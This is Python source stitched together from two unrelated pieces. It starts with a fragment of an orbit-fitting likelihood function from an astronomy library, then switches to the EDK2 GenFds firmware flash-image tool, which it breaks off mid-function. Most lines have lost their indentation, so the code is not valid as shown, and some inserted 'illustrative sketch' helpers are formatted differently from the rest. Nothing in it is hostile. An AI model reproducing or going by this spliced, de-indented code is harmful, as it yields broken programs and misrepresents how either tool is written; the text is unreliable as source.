lbdvrpmllpmbb[:,2],
pmrapmdec[:,0],pmrapmdec[:,1],
lbdvrpmllpmbb[:,3]]).T
elif customsky:
#Further transform to ra,dec,pmra,pmdec
customradec= lb_to_customsky(lbdvrpmllpmbb[:,0],
lbdvrpmllpmbb[:,1],degree=True)
custompmrapmdec= pmllpmbb_to_customsky(lbdvrpmllpmbb[:,4],
lbdvrpmllpmbb[:,5],
lbdvrpmllpmbb[:,0],
lbdvrpmllpmbb[:,1],
degree=True)
orb_vxvv= nu.array([customradec[:,0],customradec[:,1],
lbdvrpmllpmbb[:,2],
custompmrapmdec[:,0],custompmrapmdec[:,1],
lbdvrpmllpmbb[:,3]]).T
else:
#shape=(2tintJ-1,6)
orb_vxvv= nu.array([iR.flatten(),ivR.flatten(),ivT.flatten(),
iz.flatten(),ivz.flatten(),iphi.flatten()]).T
out= 0.
for ii in range(vxvv.shape[0]):
sub_vxvv= (orb_vxvv-vxvv[ii,:].flatten())**2.
#print(sub_vxvv[nu.argmin(nu.sum(sub_vxvv,axis=1))])
        if vxvv_err is not None:
sub_vxvv/= vxvv_err[ii,:]**2.
else:
sub_vxvv/= 0.01**2.
out+= logsumexp(-0.5*nu.sum(sub_vxvv,axis=1))
return -out
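# Illustrative sketch (not part of galpy): the loop above scores each observed
# point against every point along the integrated orbit, chi^2-weighting by the
# (optional) errors and soft-min-ing along the orbit with logsumexp; this is the
# same computation for a single observed point, written out for clarity.
def _single_point_loglike(orb_vxvv,obs_point,obs_err):
    """logsumexp over the orbit track of -0.5*chi^2 for one observed point (sketch)"""
    chi2= nu.sum(((orb_vxvv-obs_point)/obs_err)**2.,axis=1)
    return logsumexp(-0.5*chi2)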
|
|
## @file
# generate flash image
#
# Copyright (c) 2007 - 2018, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
from __future__ import print_function
from __future__ import absolute_import
from re import compile
from optparse import OptionParser
from sys import exit
from glob import glob
from struct import unpack
from linecache import getlines
from io import BytesIO
import Common.LongFilePathOs as os
from Common.TargetTxtClassObject import TargetTxtClassObject
from Common.DataType import *
import Common.GlobalData as GlobalData
from Common import EdkLogger
from Common.StringUtils import NormPath
from Common.Misc import DirCache, PathClass, GuidStructureStringToGuidString
from Common.Misc import SaveFileOnChange, ClearDuplicatedInf
from Common.BuildVersion import gBUILD_VERSION
from Common.MultipleWorkspace import MultipleWorkspace as mws
from Common.BuildToolError import FatalError, GENFDS_ERROR, CODE_ERROR, FORMAT_INVALID, RESOURCE_NOT_AVAILABLE, FILE_NOT_FOUND, OPTION_MISSING, FORMAT_NOT_SUPPORTED, OPTION_VALUE_INVALID, PARAMETER_INVALID
from Workspace.WorkspaceDatabase import WorkspaceDatabase
from .FdfParser import FdfParser, Warning
from .GenFdsGlobalVariable import GenFdsGlobalVariable
from .FfsFileStatement import FileStatement
## Version and Copyright
versionNumber = "1.0" + ' ' + gBUILD_VERSION
__version__ = "%prog Version " + versionNumber
__copyright__ = "Copyright (c) 2007 - 2018, Intel Corporation All rights reserved."
## Tool entrance method
#
# This method mainly dispatches to specific methods per the command line options.
# If no error is found, a zero value is returned so the caller of this tool can
# tell whether it executed successfully.
#
# @retval 0 Tool was successful
# @retval 1 Tool failed
#
def main():
global Options
Options = myOptionParser()
EdkLogger.Initialize()
return GenFdsApi(OptionsToCommandDict(Options))
def GenFdsApi(FdsCommandDict, WorkSpaceDataBase=None):
global Workspace
Workspace = ""
ArchList = None
ReturnCode = 0
try:
if FdsCommandDict.get("verbose"):
EdkLogger.SetLevel(EdkLogger.VERBOSE)
GenFdsGlobalVariable.VerboseMode = True
if FdsCommandDict.get("FixedAddress"):
GenFdsGlobalVariable.FixedLoadAddress = True
if FdsCommandDict.get("quiet"):
EdkLogger.SetLevel(EdkLogger.QUIET)
if FdsCommandDict.get("debug"):
EdkLogger.SetLevel(FdsCommandDict.get("debug") + 1)
GenFdsGlobalVariable.DebugLevel = FdsCommandDict.get("debug")
else:
EdkLogger.SetLevel(EdkLogger.INFO)
if not FdsCommandDict.get("Workspace",os.environ.get('WORKSPACE')):
EdkLogger.error("GenFds", OPTION_MISSING, "WORKSPACE not defined",
ExtraData="Please use '-w' switch to pass it or set the WORKSPACE environment variable.")
elif not os.path.exists(FdsCommandDict.get("Workspace",os.environ.get('WORKSPACE'))):
EdkLogger.error("GenFds", PARAMETER_INVALID, "WORKSPACE is invalid",
ExtraData="Please use '-w' switch to pass it or set the WORKSPACE environment variable.")
else:
Workspace = os.path.normcase(FdsCommandDict.get("Workspace",os.environ.get('WORKSPACE')))
GenFdsGlobalVariable.WorkSpaceDir = Workspace
if 'EDK_SOURCE' in os.environ:
GenFdsGlobalVariable.EdkSourceDir = os.path.normcase(os.environ['EDK_SOURCE'])
if FdsCommandDict.get("debug"):
GenFdsGlobalVariable.VerboseLogger("Using Workspace:" + Workspace)
if FdsCommandDict.get("GenfdsMultiThread"):
GenFdsGlobalVariable.EnableGenfdsMultiThread = True
os.chdir(GenFdsGlobalVariable.WorkSpaceDir)
# set multiple workspace
PackagesPath = os.getenv("PACKAGES_PATH")
mws.setWs(GenFdsGlobalVariable.WorkSpaceDir, PackagesPath)
if FdsCommandDict.get("fdf_file"):
FdfFilename = FdsCommandDict.get("fdf_file")[0].Path
FdfFilename = GenFdsGlobalVariable.ReplaceWorkspaceMacro(FdfFilename)
if FdfFilename[0:2] == '..':
FdfFilename = os.path.realpath(FdfFilename)
if not os.path.isabs(FdfFilename):
FdfFilename = mws.join(GenFdsGlobalVariable.WorkSpaceDir, FdfFilename)
if not os.path.exists(FdfFilename):
EdkLogger.error("GenFds", FILE_NOT_FOUND, ExtraData=FdfFilename)
GenFdsGlobalVariable.FdfFile = FdfFilename
GenFdsGlobalVariable.FdfFileTimeStamp = os.path.getmtime(FdfFilename)
else:
EdkLogger.error("GenFds", OPTION_MISSING, "Missing FDF filename")
if FdsCommandDict.get("build_target"):
GenFdsGlobalVariable.TargetName = FdsCommandDict.get("build_target")
if FdsCommandDict.get("toolchain_tag"):
GenFdsGlobalVariable.ToolChainTag = FdsCommandDict.get("toolchain_tag")
if FdsCommandDict.get("active_platform"):
ActivePlatform = FdsCommandDict.get("active_platform")
ActivePlatform = GenFdsGlobalVariable.ReplaceWorkspaceMacro(ActivePlatform)
if ActivePlatform[0:2] == '..':
ActivePlatform = os.path.realpath(ActivePlatform)
if not os.path.isabs (ActivePlatform):
ActivePlatform = mws.join(GenFdsGlobalVariable.WorkSpaceDir, ActivePlatform)
if not os.path.exists(ActivePlatform):
EdkLogger.error("GenFds", FILE_NOT_FOUND, "ActivePlatform doesn't exist!")
else:
EdkLogger.error("GenFds", OPTION_MISSING, "Missing active platform")
GlobalData.BuildOptionPcd = FdsCommandDict.get("OptionPcd") if FdsCommandDict.get("OptionPcd") else {}
GenFdsGlobalVariable.ActivePlatform = PathClass(NormPath(ActivePlatform))
if FdsCommandDict.get("conf_directory"):
# Get alternate Conf location, if it is absolute, then just use the absolute directory name
ConfDirectoryPath = os.path.normpath(FdsCommandDict.get("conf_directory"))
if ConfDirectoryPath.startswith('"'):
ConfDirectoryPath = ConfDirectoryPath[1:]
if ConfDirectoryPath.endswith('"'):
ConfDirectoryPath = ConfDirectoryPath[:-1]
if not os.path.isabs(ConfDirectoryPath):
# Since alternate directory name is not absolute, the alternate directory is located within the WORKSPACE
# This also handles someone specifying the Conf directory in the workspace. Using --conf=Conf
ConfDirectoryPath = os.path.join(GenFdsGlobalVariable.WorkSpaceDir, ConfDirectoryPath)
else:
if "CONF_PATH" in os.environ:
ConfDirectoryPath = os.path.normcase(os.environ["CONF_PATH"])
else:
# Get standard WORKSPACE/Conf, use the absolute path to the WORKSPACE/Conf
ConfDirectoryPath = mws.join(GenFdsGlobalVariable.WorkSpaceDir, 'Conf')
GenFdsGlobalVariable.ConfDir = ConfDirectoryPath
if not GlobalData.gConfDirectory:
GlobalData.gConfDirectory = GenFdsGlobalVariable.ConfDir
BuildConfigurationFile = os.path.normpath(os.path.join(ConfDirectoryPath, "target.txt"))
if os.path.isfile(BuildConfigurationFile) == True:
TargetTxt = TargetTxtClassObject()
TargetTxt.LoadTargetTxtFile(BuildConfigurationFile)
# if no build target given in command line, get it from target.txt
if not GenFdsGlobalVariable.TargetName:
BuildTargetList = TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TARGET]
if len(BuildTargetList) != 1:
EdkLogger.error("GenFds", OPTION_VALUE_INVALID, ExtraData="Only allows one instance for Target.")
GenFdsGlobalVariable.TargetName = BuildTargetList[0]
# if no tool chain given in command line, get it from target.txt
if not GenFdsGlobalVariable.ToolChainTag:
ToolChainList = TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TOOL_CHAIN_TAG]
if ToolChainList is None or len(ToolChainList) == 0:
EdkLogger.error("GenFds", RESOURCE_NOT_AVAILABLE, ExtraData="No toolchain given. Don't know how to build.")
if len(ToolChainList) != 1:
EdkLogger.error("GenFds", OPTION_VALUE_INVALID, ExtraData="Only allows one instance for ToolChain.")
GenFdsGlobalVariable.ToolChainTag = ToolChainList[0]
else:
EdkLogger.error("GenFds", FILE_NOT_FOUND, ExtraData=BuildConfigurationFile)
#Set global flag for build mode
GlobalData.gIgnoreSource = FdsCommandDict.get("IgnoreSources")
if FdsCommandDict.get("macro"):
for Pair in FdsCommandDict.get("macro"):
if Pair.startswith('"'):
Pair = Pair[1:]
if Pair.endswith('"'):
Pair = Pair[:-1]
List = Pair.split('=')
if len(List) == 2:
if not List[1].strip():
EdkLogger.error("GenFds", OPTION_VALUE_INVALID, ExtraData="No Value given for Macro %s" %List[0])
if List[0].strip() == "EFI_SOURCE":
GlobalData.gEfiSource = List[1].strip()
GlobalData.gGlobalDefines["EFI_SOURCE"] = GlobalData.gEfiSource
continue
elif List[0].strip() == "EDK_SOURCE":
GlobalData.gEdkSource = List[1].strip()
GlobalData.gGlobalDefines["EDK_SOURCE"] = GlobalData.gEdkSource
continue
elif List[0].strip() in ["WORKSPACE", "TARGET", "TOOLCHAIN"]:
GlobalData.gGlobalDefines[List[0].strip()] = List[1].strip()
else:
GlobalData.gCommandLineDefines[List[0].strip()] = List[1].strip()
else:
GlobalData.gCommandLineDefines[List[0].strip()] = "TRUE"
os.environ["WORKSPACE"] = Workspace
# Use the -t and -b option as gGlobalDefines's TOOLCHAIN and TARGET if they are not defined
if "TARGET" not in GlobalData.gGlobalDefines:
GlobalData.gGlobalDefines["TARGET"] = GenFdsGlobalVariable.TargetName
if "TOOLCHAIN" not in GlobalData.gGlobalDefines:
GlobalData.gGlobalDefines["TOOLCHAIN"] = GenFdsGlobalVariable.ToolChainTag
if "TOOL_CHAIN_TAG" not in GlobalData.gGlobalDefines:
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = GenFdsGlobalVariable.ToolChainTag
"""call Workspace build create database"""
GlobalData.gDatabasePath = os.path.normpath(os.path.join(ConfDirectoryPath, GlobalData.gDatabasePath))
if WorkSpaceDataBase:
BuildWorkSpace = WorkSpaceDataBase
else:
BuildWorkSpace = WorkspaceDatabase()
#
# Get files real name in workspace dir
#
GlobalData.gAllFiles = DirCache(Workspace)
GlobalData.gWorkspace = Workspace
if FdsCommandDict.get("build_architecture_list"):
ArchList = FdsCommandDict.get("build_architecture_list").split(',')
else:
ArchList = BuildWorkSpace.BuildObject[GenFdsGlobalVariable.ActivePlatform, TAB_COMMON, FdsCommandDict.get("build_target"), FdsCommandDict.get("toolchain_tag")].SupArchList
TargetArchList = set(BuildWorkSpace.BuildObject[GenFdsGlobalVariable.ActivePlatform, TAB_COMMON, FdsCommandDict.get("build_target"), FdsCommandDict.get("toolchain_tag")].SupArchList) & set(ArchList)
if len(TargetArchList) == 0:
EdkLogger.error("GenFds", GENFDS_ERROR, "Target ARCH %s not in platform supported ARCH %s" % (str(ArchList), str(BuildWorkSpace.BuildObject[GenFdsGlobalVariable.ActivePlatform, TAB_COMMON].SupArchList)))
for Arch in ArchList:
GenFdsGlobalVariable.OutputDirFromDscDict[Arch] = NormPath(BuildWorkSpace.BuildObject[GenFdsGlobalVariable.ActivePlatform, Arch, FdsCommandDict.get("build_target"), FdsCommandDict.get("toolchain_tag")].OutputDirectory)
# assign platform name based on last entry in ArchList
GenFdsGlobalVariable.PlatformName = BuildWorkSpace.BuildObject[GenFdsGlobalVariable.ActivePlatform, ArchList[-1], FdsCommandDict.get("build_target"), FdsCommandDict.get("toolchain_tag")].PlatformName
if FdsCommandDict.get("platform_build_directory"):
OutputDirFromCommandLine = GenFdsGlobalVariable.ReplaceWorkspaceMacro(FdsCommandDict.get("platform_build_directory"))
if not os.path.isabs (OutputDirFromCommandLine):
OutputDirFromCommandLine = os.path.join(GenFdsGlobalVariable.WorkSpaceDir, OutputDirFromCommandLine)
for Arch in ArchList:
GenFdsGlobalVariable.OutputDirDict[Arch] = OutputDirFromCommandLine
else:
for Arch in ArchList:
GenFdsGlobalVariable.OutputDirDict[Arch] = os.path.join(GenFdsGlobalVariable.OutputDirFromDscDict[Arch], GenFdsGlobalVariable.TargetName + '_' + GenFdsGlobalVariable.ToolChainTag)
for Key in GenFdsGlobalVariable.OutputDirDict:
OutputDir = GenFdsGlobalVariable.OutputDirDict[Key]
if OutputDir[0:2] == '..':
OutputDir = os.path.realpath(OutputDir)
if OutputDir[1] != ':':
OutputDir = os.path.join (GenFdsGlobalVariable.WorkSpaceDir, OutputDir)
if not os.path.exists(OutputDir):
EdkLogger.error("GenFds", FILE_NOT_FOUND, ExtraData=OutputDir)
GenFdsGlobalVariable.OutputDirDict[Key] = OutputDir
""" Parse Fdf file, has to place after build Workspace as FDF may contain macros from DSC file """
if WorkSpaceDataBase:
FdfParserObj = GlobalData.gFdfParser
else:
FdfParserObj = FdfParser(FdfFilename)
FdfParserObj.ParseFile()
if FdfParserObj.CycleReferenceCheck():
EdkLogger.error("GenFds", FORMAT_NOT_SUPPORTED, "Cycle Reference Detected in FDF file")
if FdsCommandDict.get("fd"):
if FdsCommandDict.get("fd")[0].upper() in FdfParserObj.Profile.FdDict:
GenFds.OnlyGenerateThisFd = FdsCommandDict.get("fd")[0]
else:
EdkLogger.error("GenFds", OPTION_VALUE_INVALID,
"No such an FD in FDF file: %s" % FdsCommandDict.get("fd")[0])
if FdsCommandDict.get("fv"):
if FdsCommandDict.get("fv")[0].upper() in FdfParserObj.Profile.FvDict:
GenFds.OnlyGenerateThisFv = FdsCommandDict.get("fv")[0]
else:
EdkLogger.error("GenFds", OPTION_VALUE_INVALID,
"No such an FV in FDF file: %s" % FdsCommandDict.get("fv")[0])
if FdsCommandDict.get("cap"):
if FdsCommandDict.get("cap")[0].upper() in FdfParserObj.Profile.CapsuleDict:
GenFds.OnlyGenerateThisCap = FdsCommandDict.get("cap")[0]
else:
EdkLogger.error("GenFds", OPTION_VALUE_INVALID,
"No such a Capsule in FDF file: %s" % FdsCommandDict.get("cap")[0])
GenFdsGlobalVariable.WorkSpace = BuildWorkSpace
if ArchList:
GenFdsGlobalVariable.ArchList = ArchList
# Dsc Build Data will handle Pcd Settings from CommandLine.
"""Modify images from build output if the feature of loading driver at fixed address is on."""
if GenFdsGlobalVariable.FixedLoadAddress:
GenFds.PreprocessImage(BuildWorkSpace, GenFdsGlobalVariable.ActivePlatform)
        # Record the FV Region info that may be specified in the FD
if FdfParserObj.Profile.FvDict and FdfParserObj.Profile.FdDict:
for FvObj in FdfParserObj.Profile.FvDict.values():
for FdObj in FdfParserObj.Profile.FdDict.values():
for RegionObj in FdObj.RegionList:
if RegionObj.RegionType != BINARY_FILE_TYPE_FV:
continue
for RegionData in RegionObj.RegionDataList:
if FvObj.UiFvName.upper() == RegionData.upper():
if FvObj.FvRegionInFD:
if FvObj.FvRegionInFD != RegionObj.Size:
EdkLogger.error("GenFds", FORMAT_INVALID, "The FV %s's region is specified in multiple FD with different value." %FvObj.UiFvName)
else:
FvObj.FvRegionInFD = RegionObj.Size
RegionObj.BlockInfoOfRegion(FdObj.BlockSizeList, FvObj)
"""Call GenFds"""
GenFds.GenFd('', FdfParserObj, BuildWorkSpace, ArchList)
"""Generate GUID cross reference file"""
GenFds.GenerateGuidXRefFile(BuildWorkSpace, ArchList, FdfParserObj)
"""Display FV space info."""
GenFds.DisplayFvSpaceInfo(FdfParserObj)
except Warning as X:
EdkLogger.error(X.ToolName, FORMAT_INVALID, File=X.FileName, Line=X.LineNumber, ExtraData=X.Message, RaiseError=False)
ReturnCode = FORMAT_INVALID
except FatalError as X:
if FdsCommandDict.get("debug") is not None:
import traceback
EdkLogger.quiet(traceback.format_exc())
ReturnCode = X.args[0]
except:
import traceback
EdkLogger.error(
"\nPython",
CODE_ERROR,
"Tools code failure",
ExtraData="Please send email to [email protected] for help, attaching following call stack trace!\n",
RaiseError=False
)
EdkLogger.quiet(traceback.format_exc())
ReturnCode = CODE_ERROR
finally:
ClearDuplicatedInf()
return ReturnCode
def OptionsToCommandDict(Options):
FdsCommandDict = {}
FdsCommandDict["verbose"] = Options.verbose
FdsCommandDict["FixedAddress"] = Options.FixedAddress
FdsCommandDict["quiet"] = Options.quiet
FdsCommandDict["debug"] = Options.debug
FdsCommandDict["Workspace"] = Options.Workspace
FdsCommandDict["GenfdsMultiThread"] = Options.GenfdsMultiThread
FdsCommandDict["fdf_file"] = [PathClass(Options.filename)] if Options.filename else []
FdsCommandDict["build_target"] = Options.BuildTarget
FdsCommandDict["toolchain_tag"] = Options.ToolChain
FdsCommandDict["active_platform"] = Options.activePlatform
FdsCommandDict["OptionPcd"] = Options.OptionPcd
FdsCommandDict["conf_directory"] = Options.ConfDirectory
FdsCommandDict["IgnoreSources"] = Options.IgnoreSources
FdsCommandDict["macro"] = Options.Macros
FdsCommandDict["build_architecture_list"] = Options.archList
FdsCommandDict["platform_build_directory"] = Options.outputDir
FdsCommandDict["fd"] = [Options.uiFdName] if Options.uiFdName else []
FdsCommandDict["fv"] = [Options.uiFvName] if Options.uiFvName else []
FdsCommandDict["cap"] = [Options.uiCapName] if Options.uiCapName else []
return FdsCommandDict
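## Example command dictionary -- illustrative sketch, not part of the original tool
#
#   GenFdsApi can also be driven programmatically with a dictionary shaped like
#   the one assembled above; the platform, FDF and directory names below are
#   hypothetical placeholders, and any key left out is simply treated as unset
#   (GenFdsApi reads every entry with .get()).
#
def _ExampleFdsCommandDict(WorkspaceDir):
    return {
        "Workspace": WorkspaceDir,
        "fdf_file": [PathClass(os.path.join(WorkspaceDir, "ExamplePkg", "Example.fdf"))],
        "active_platform": os.path.join(WorkspaceDir, "ExamplePkg", "ExamplePkg.dsc"),
        "build_target": "DEBUG",
        "toolchain_tag": "GCC5",
        "build_architecture_list": "IA32,X64",
        "conf_directory": "Conf",
        "macro": [],
        "fd": [],
        "fv": [],
        "cap": [],
    }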
gParamCheck = []
def SingleCheckCallback(option, opt_str, value, parser):
if option not in gParamCheck:
setattr(parser.values, option.dest, value)
gParamCheck.append(option)
else:
parser.error("Option %s only allows one instance in command line!" % option)
## Parse command line options
#
# Using standard Python module optparse to parse command line option of this tool.
#
# @retval Opt An optparse.Values object containing the parsed options
#
def myOptionParser():
usage = "%prog [options] -f input_file -a arch_list -b build_target -p active_platform -t tool_chain_tag -D \"MacroName [= MacroValue]\""
Parser = OptionParser(usage=usage, description=__copyright__, version="%prog " + str(versionNumber))
Parser.add_option("-f", "--file", dest="filename", type="string", help="Name of FDF file to convert", action="callback", callback=SingleCheckCallback)
Parser.add_option("-a", "--arch", dest="archList", help="comma separated list containing one or more of: IA32, X64, IPF, ARM, AARCH64 or EBC which should be built, overrides target.txt?s TARGET_ARCH")
Parser.add_option("-q", "--quiet", action="store_true", type=None, help="Disable all messages except FATAL ERRORS.")
Parser.add_option("-v", "--verbose", action="store_true", type=None, help="Turn on verbose output with informational messages printed.")
Parser.add_option("-d", "--debug", action="store", type="int", help="Enable debug messages at specified level.")
Parser.add_option("-p", "--platform", type="string", dest="activePlatform", help="Set the ACTIVE_PLATFORM, overrides target.txt ACTIVE_PLATFORM setting.",
action="callback", callback=SingleCheckCallback)
Parser.add_option("-w", "--workspace", type="string", dest="Workspace", default=os.environ.get('WORKSPACE'), help="Set the WORKSPACE",
action="callback", callback=SingleCheckCallback)
Parser.add_option("-o", "--outputDir", type="string", dest="outputDir", help="Name of Build Output directory",
action="callback", callback=SingleCheckCallback)
Parser.add_option("-r", "--rom_image", dest="uiFdName", help="Build the image using the [FD] section named by FdUiName.")
Parser.add_option("-i", "--FvImage", dest="uiFvName", help="Build the FV image using the [FV] section named by UiFvName")
Parser.add_option("-C", "--CapsuleImage", dest="uiCapName", help="Build the Capsule image using the [Capsule] section named by UiCapName")
Parser.add_option("-b", "--buildtarget", type="string", dest="BuildTarget", help="Set the build TARGET, overrides target.txt TARGET setting.",
action="callback", callback=SingleCheckCallback)
Parser.add_option("-t", "--tagname", type="string", dest="ToolChain", help="Using the tools: TOOL_CHAIN_TAG name to build the platform.",
action="callback", callback=SingleCheckCallback)
Parser.add_option("-D", "--define", action="append", type="string", dest="Macros", help="Macro: \"Name [= Value]\".")
Parser.add_option("-s", "--specifyaddress", dest="FixedAddress", action="store_true", type=None, help="Specify driver load address.")
Parser.add_option("--conf", action="store", type="string", dest="ConfDirectory", help="Specify the customized Conf directory.")
Parser.add_option("--ignore-sources", action="store_true", dest="IgnoreSources", default=False, help="Focus to a binary build and ignore all source files")
Parser.add_option("--pcd", action="append", dest="OptionPcd", help="Set PCD value by command line. Format: \"PcdName=Value\" ")
Parser.add_option("--genfds-multi-thread", action="store_true", dest="GenfdsMultiThread", default=False, help="Enable GenFds multi thread to generate ffs file.")
Options, _ = Parser.parse_args()
return Options
## The class implementing the EDK2 flash image generation process
#
# This process includes:
# 1. Collect workspace information, including platform and module information
# 2. Call methods of Fd class to generate FD
# 3. Call methods of Fv class to generate FVs that do not belong to any FD
#
class GenFds(object):
FdfParsef = None
OnlyGenerateThisFd = None
OnlyGenerateThisFv = None
OnlyGenerateThisCap = None
## GenFd()
#
# @param OutputDir Output directory
# @param FdfParserObject FDF contents parser
# @param Workspace The directory of workspace
# @param ArchList The Arch list of platform
#
@staticmethod
def GenFd (OutputDir, FdfParserObject, WorkSpace, ArchList):
GenFdsGlobalVariable.SetDir ('', FdfParserObject, WorkSpace, ArchList)
GenFdsGlobalVariable.VerboseLogger(" Generate all Fd images and their required FV and Capsule images!")
if GenFds.OnlyGenerateThisCap is not None and GenFds.OnlyGenerateThisCap.upper() in GenFdsGlobalVariable.FdfParser.Profile.CapsuleDict:
CapsuleObj = GenFdsGlobalVariable.FdfParser.Profile.CapsuleDict[GenFds.OnlyGenerateThisCap.upper()]
if CapsuleObj is not None:
CapsuleObj.GenCapsule()
return
if GenFds.OnlyGenerateThisFd is not None and GenFds.OnlyGenerateThisFd.upper() in GenFdsGlobalVariable.FdfParser.Profile.FdDict:
FdObj = GenFdsGlobalVariable.FdfParser.Profile.FdDict[GenFds.OnlyGenerateThisFd.upper()]
if FdObj is not None:
FdObj.GenFd()
return
elif GenFds.OnlyGenerateThisFd is None and GenFds.OnlyGenerateThisFv is None:
for FdObj in GenFdsGlobalVariable.FdfParser.Profile.FdDict.values():
FdObj.GenFd()
GenFdsGlobalVariable.VerboseLogger("\n Generate other FV images! ")
if GenFds.OnlyGenerateThisFv is not None and GenFds.OnlyGenerateThisFv.upper() in GenFdsGlobalVariable.FdfParser.Profile.FvDict:
FvObj = GenFdsGlobalVariable.FdfParser.Profile.FvDict[GenFds.OnlyGenerateThisFv.upper()]
if FvObj is not None:
Buffer = BytesIO()
FvObj.AddToBuffer(Buffer)
Buffer.close()
return
elif GenFds.OnlyGenerateThisFv is None:
for FvObj in GenFdsGlobalVariable.FdfParser.Profile.FvDict.values():
                Buffer = BytesIO()
FvObj.AddToBuffer(Buffer)
Buffer.close()
if GenFds.OnlyGenerateThisFv is None and GenFds.OnlyGenerateThisFd is None and GenFds.OnlyGenerateThisCap is None:
if GenFdsGlobalVariable.FdfParser.Profile.CapsuleDict != {}:
GenFdsGlobalVariable.VerboseLogger("\n Generate other Capsule images!")
for CapsuleObj in GenFdsGlobalVariable.FdfParser.Profile.CapsuleDict.values():
CapsuleObj.GenCapsule()
if GenFdsGlobalVariable.FdfParser.Profile.OptRomDict != {}:
GenFdsGlobalVariable.VerboseLogger("\n Generate all Option ROM!")
for OptRomObj in GenFdsGlobalVariable.FdfParser.Profile.OptRomDict.values():
OptRomObj.AddToBuffer(None)
@staticmethod
def GenFfsMakefile(OutputDir, FdfParserObject, WorkSpace, ArchList, GlobalData):
GenFdsGlobalVariable.SetEnv(FdfParserObject, WorkSpace, ArchList, GlobalData)
for FdObj in GenFdsGlobalVariable.FdfParser.Profile.FdDict.values():
FdObj.GenFd(Flag=True)
for FvObj in GenFdsGlobalVariable.FdfParser.Profile.FvDict.values():
FvObj.AddToBuffer(Buffer=None, Flag=True)
if GenFdsGlobalVariable.FdfParser.Profile.OptRomDict != {}:
for OptRomObj in GenFdsGlobalVariable.FdfParser.Profile.OptRomDict.values():
OptRomObj.AddToBuffer(Buffer=None, Flag=True)
return GenFdsGlobalVariable.FfsCmdDict
## GetFvBlockSize()
#
# @param FvObj Whose block size to get
# @retval int Block size value
#
@staticmethod
def GetFvBlockSize(FvObj):
DefaultBlockSize = 0x1
FdObj = None
if GenFds.OnlyGenerateThisFd is not None and GenFds.OnlyGenerateThisFd.upper() in GenFdsGlobalVariable.FdfParser.Profile.FdDict:
FdObj = GenFdsGlobalVariable.FdfParser.Profile.FdDict[GenFds.OnlyGenerateThisFd.upper()]
if FdObj is None:
for ElementFd in GenFdsGlobalVariable.FdfParser.Profile.FdDict.values():
for ElementRegion in ElementFd.RegionList:
if ElementRegion.RegionType == BINARY_FILE_TYPE_FV:
for ElementRegionData in ElementRegion.RegionDataList:
if ElementRegionData is not None and ElementRegionData.upper() == FvObj.UiFvName:
if FvObj.BlockSizeList != []:
return FvObj.BlockSizeList[0][0]
else:
return ElementRegion.BlockSizeOfRegion(ElementFd.BlockSizeList)
if FvObj.BlockSizeList != []:
return FvObj.BlockSizeList[0][0]
return DefaultBlockSize
else:
for ElementRegion in FdObj.RegionList:
if ElementRegion.RegionType == BINARY_FILE_TYPE_FV:
for ElementRegionData in ElementRegion.RegionDataList:
if ElementRegionData is not None and ElementRegionData.upper() == FvObj.UiFvName:
if FvObj.BlockSizeList != []:
return FvObj.BlockSizeList[0][0]
else:
return ElementRegion.BlockSizeOfRegion(ElementFd.BlockSizeList)
return DefaultBlockSize
## DisplayFvSpaceInfo()
#
    # @param FdfParserObject FDF contents parser
# @retval None
#
@staticmethod
def DisplayFvSpaceInfo(FdfParserObject):
FvSpaceInfoList = []
MaxFvNameLength = 0
for FvName in FdfParserObject.Profile.FvDict:
if len(FvName) > MaxFvNameLength:
MaxFvNameLength = len(FvName)
FvSpaceInfoFileName = os.path.join(GenFdsGlobalVariable.FvDir, FvName.upper() + '.Fv.map')
if os.path.exists(FvSpaceInfoFileName):
FileLinesList = getlines(FvSpaceInfoFileName)
TotalFound = False
Total = ''
UsedFound = False
Used = ''
FreeFound = False
Free = ''
for Line in FileLinesList:
NameValue = Line.split('=')
if len(NameValue) == 2:
if NameValue[0].strip() == 'EFI_FV_TOTAL_SIZE':
TotalFound = True
Total = NameValue[1].strip()
if NameValue[0].strip() == 'EFI_FV_TAKEN_SIZE':
UsedFound = True
Used = NameValue[1].strip()
if NameValue[0].strip() == 'EFI_FV_SPACE_SIZE':
FreeFound = True
Free = NameValue[1].strip()
if TotalFound and UsedFound and FreeFound:
FvSpaceInfoList.append((FvName, Total, Used, Free))
GenFdsGlobalVariable.InfLogger('\nFV Space Information')
for FvSpaceInfo in FvSpaceInfoList:
Name = FvSpaceInfo[0]
TotalSizeValue = long(FvSpaceInfo[1], 0)
UsedSizeValue = long(FvSpaceInfo[2], 0)
FreeSizeValue = long(FvSpaceInfo[3], 0)
if UsedSizeValue == TotalSizeValue:
Percentage = '100'
else:
Percentage = str((UsedSizeValue + 0.0) / TotalSizeValue)[0:4].lstrip('0.')
GenFdsGlobalVariable.InfLogger(Name + ' ' + '[' + Percentage + '%Full] ' + str(TotalSizeValue) + ' total, ' + str(UsedSizeValue) + ' used, ' + str(FreeSizeValue) + ' free')
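    ## _FvUsageFromMapLines() -- illustrative sketch, not part of the original tool
    #
    #   The .Fv.map files read by DisplayFvSpaceInfo above are plain "NAME = value"
    #   listings; this helper shows the three keys being looked for and how the
    #   numbers are interpreted (the values are C-style literals, e.g. 0x280000).
    #
    @staticmethod
    def _FvUsageFromMapLines(FileLinesList):
        FvInfo = {}
        for Line in FileLinesList:
            NameValue = Line.split('=')
            if len(NameValue) == 2:
                FvInfo[NameValue[0].strip()] = NameValue[1].strip()
        Total = int(FvInfo['EFI_FV_TOTAL_SIZE'], 0)
        Used = int(FvInfo['EFI_FV_TAKEN_SIZE'], 0)
        Free = int(FvInfo['EFI_FV_SPACE_SIZE'], 0)
        return Total, Used, Free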
## PreprocessImage()
#
# @param BuildDb Database from build meta data files
# @param DscFile modules from dsc file will be preprocessed
# @retval None
#
@staticmethod
def PreprocessImage(BuildDb, DscFile):
PcdDict = BuildDb.BuildObject[DscFile, TAB_COMMON, GenFdsGlobalVariable.TargetName, GenFdsGlobalVariable.ToolChainTag].Pcds
PcdValue = ''
for Key in PcdDict:
PcdObj = PcdDict[Key]
if PcdObj.TokenCName == 'PcdBsBaseAddress':
